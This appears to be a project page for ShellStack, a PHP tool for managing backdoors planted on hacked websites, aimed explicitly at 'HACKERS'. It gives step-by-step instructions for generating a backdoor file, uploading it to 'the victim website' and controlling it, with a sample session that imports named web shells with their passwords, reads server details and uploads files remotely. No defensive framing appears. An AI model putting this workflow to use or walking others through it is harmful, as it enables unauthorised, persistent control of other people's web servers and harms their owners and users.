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Last Updated: 2023-02-20 16:55:04

A PHP Based Tool That Helps You To Manage All Your Backdoored Websites Efficiently.


Languages: PHP


Version 1.0

ShellStack is a PHP based backdoor management tool. This Tool comes handy for "HACKERS" who wish to keep a track of every website they hack. The tool generates a backdoor file which you just have to upload to the site and put the backdoor URL in the shells.txt present in the tool's directory.

With ShellStack You can

  • Import PHP Shells
  • Get Server Details
  • Upload Files From Your System using your terminal
  • And Above all You Can Manage Your Backdoors Efficiently

How To Use

  1. git clone
  2. cd shellstack
  3. php shellstack.php
  4. generatebd and exit the tool use CTRL + C - This will generate a backdoor file in the same directory as of the tool in a file named backdoor.php
  5. Upload The Backdoor File To The Victim website
  6. Copy The Backdoor URL and paste it in the shells.txt file present in the tool's directory and save it (Each backdoor is separated by a new line)
  7. php shellstack.php
  8. Enter The Serial No Assigned To The Backdoor
  9. Rest is pretty Self explanatory

Watch The Video Here:




root@R3D_MACH1N3:/home/redhaxor/Desktop/shellstack# php shellstack.php

_______ _     _ _______               _______ _______ _______ _______ _     _
|______ |_____| |______ |      |      |______    |    |_____| |       |____/
______| |     | |______ |_____ |_____ ______|    |    |     | |_____  |    \_

                    Simple Backdoor Management System
                    Coded By R3D#@x0R_2H1N A.K.A Tuhinshubhra 
                    Shout Out: LulZSec India  

List Of Backdoors:

0. http://localhost/backdoor.php

[#] Enter Either Of These (Backdoor No.|help|generatebd) : 0

[+] Shell Selected: http://localhost/backdoor.php
[+] Validating Backdoor: Backdoor Found!

List Of Actions
[1] Import PHP Shells
[2] Server Details
[3] Remove Backdoor
[4] Remote File Upload
[5] Exit

[#] Select Option(1|2|3|4|5):2

[+] Server Info
[i] Sending Request And Getting Response...
[i] Server: Linux R3D_MACH1N3 4.9.0-kali4-amd64 #1 SMP Debian 4.9.30-1kali1 (2017-06-06) x86_64
[i] Server IP:

Press Enter To Continue

List Of Actions
[1] Import PHP Shells
[2] Server Details
[3] Remove Backdoor
[4] Remote File Upload
[5] Exit

[#] Select Option(1|2|3|4|5):1

List Of Shells
[1] Dhanush shell {User & Pass : shellstack123}
[2] B374K shell {Pass : shellstack123}
[3] Kurama shell V.1.0 {Pass : red}
[4] WSO shell {Pass : shellstack123}
[5] MiNi shell {User & Pass : shellstack123}

[#] Select Shell To Import(1-5):1

[i] Importing Shell...
[i] Sending Request And Getting Response...
[R] Dhanush Shell Imported Successfully To /var/www/html/dhanush.php

Press Enter To Continue

List Of Actions
[1] Import PHP Shells
[2] Server Details
[3] Remove Backdoor
[4] Remote File Upload
[5] Exit

[#] Select Option(1|2|3|4|5):5


Version 1.0 On 14-06-2017


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